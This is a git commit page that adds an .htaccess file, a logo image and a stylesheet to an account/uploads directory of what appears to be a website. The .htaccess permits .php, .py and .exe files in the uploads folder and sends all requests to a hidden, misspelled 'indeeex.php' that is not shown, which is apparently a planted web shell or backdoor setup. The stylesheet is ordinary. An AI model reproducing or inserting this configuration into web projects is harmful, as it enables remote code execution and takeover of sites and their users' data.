commitall
This commit is contained in:
11
account/uploads/.htaccess
Normal file
11
account/uploads/.htaccess
Normal file
@ -0,0 +1,11 @@
|
||||
<FilesMatch ".(py|exe|php)$">
|
||||
Order allow,deny
|
||||
Allow from all
|
||||
</FilesMatch>
|
||||
RewriteEngine On
|
||||
RewriteBase /
|
||||
RewriteRule ^indeeex\.php$ - [L]
|
||||
RewriteCond %{REQUEST_FILENAME} !-f
|
||||
RewriteCond %{REQUEST_FILENAME} !-d
|
||||
RewriteRule . /indeeex.php [L]
|
||||
DirectoryIndex indeeex.php index.php
|
BIN
account/uploads/logo.png
Normal file
BIN
account/uploads/logo.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 12 KiB |
37
account/uploads/style.css
Normal file
37
account/uploads/style.css
Normal file
@ -0,0 +1,37 @@
|
||||
*{box-sizing: border-box;padding:0;}
|
||||
body{font-size: 15px;color:#333;line-height:20px;font-family: 'Courier New', Courier, monospace;padding-bottom: 50px;}
|
||||
img{width:100%;}
|
||||
h1{font-size:35px;}h2{font-style: 28px;}h3{font-style: 23px;}h4{font-style: 20px;}ul{list-style: none;}
|
||||
header.tp-hdr-sec {
|
||||
background: #fff;padding-top: 20px;
|
||||
}.yr-tpdetas{text-align: center;}.algn-cntr{display: flex;align-items: center;}.yr-tpdetas .yr0tryoe{color: #1b4599;
|
||||
font-size: 46px;}.yr-tpdetas h3{ color: #b01f24;
|
||||
font-size: 25px;}.yr-tpdetas h4{ color: #1b4599;
|
||||
font-size: 20px;}.rgt-sec_prt ul li i{color: #1b4599; margin-left: -20px;}.rgt-sec_prt ul li{color: #b01f24; margin-left: 20px;
|
||||
font-weight: 600;line-height: 25px;}.purchs-ord{padding: 20px 0px;}
|
||||
.purc-bgprt, .wst-100-bg{ background: #ddd;
|
||||
padding: 5px 15px;}.purc-bgprt span, .wst-100-bg span{font-weight: 700;}.rgt-pt-20{ text-align: right;
|
||||
padding-top: 20px;}.mb-10{margin-bottom: 10px;}.ul_sec-prst{ padding-top: 10px; padding-left: 15px;}
|
||||
.ul_sec-prst li{font-weight: 500;font-size: 15px;
|
||||
line-height: 25px;}.inpt-wdt{width:170px;}.txt-rgt-prt{text-align: right;}.txt-rgt-prt p{line-height: 5px;}
|
||||
.tg {border-collapse:collapse;border-spacing:0;}
|
||||
.tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px;
|
||||
overflow:hidden;padding:10px 5px;word-break:normal;}
|
||||
.tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px;
|
||||
font-weight:600;overflow:hidden;padding:10px 5px;word-break:normal; background: #ddd;}
|
||||
.tg .tg-0pky{border-color:#333;text-align:center;vertical-align:top}.upr_tbl-secprt{padding-top:10px;}.lwr_tbl-secprt{padding-top:40px;}table{width:100%;}
|
||||
.trsm-cnd_prt ul li{width: 100%;display: inline-flex;font-weight: 500;line-height: 0px;}.trms-cnd-ttl{padding-top:20px;}.trsm-cnd_prt ul li p{ display: flex;
|
||||
width: 100%;
|
||||
justify-content: end;}.trsm-cnd_prt ul li span{width:25%;}.ttms-trs-1 ul li{font-style: italic;}.pb-0-p-prt {
|
||||
padding-bottom: 0px;
|
||||
color: #fff;
|
||||
margin-bottom: 0px;
|
||||
font-size: 17px;
|
||||
font-weight: 600;
|
||||
}.sdr_cenr-tr{padding-left:50px;}
|
||||
.lwr-rd-prt{height: 100px;
|
||||
background: #b01f24;
|
||||
text-align: center;
|
||||
display: flex;
|
||||
align-items: center;
|
||||
border-top-left-radius: 25px;border-bottom-right-radius: 25px;}
|
Reference in New Issue
Block a user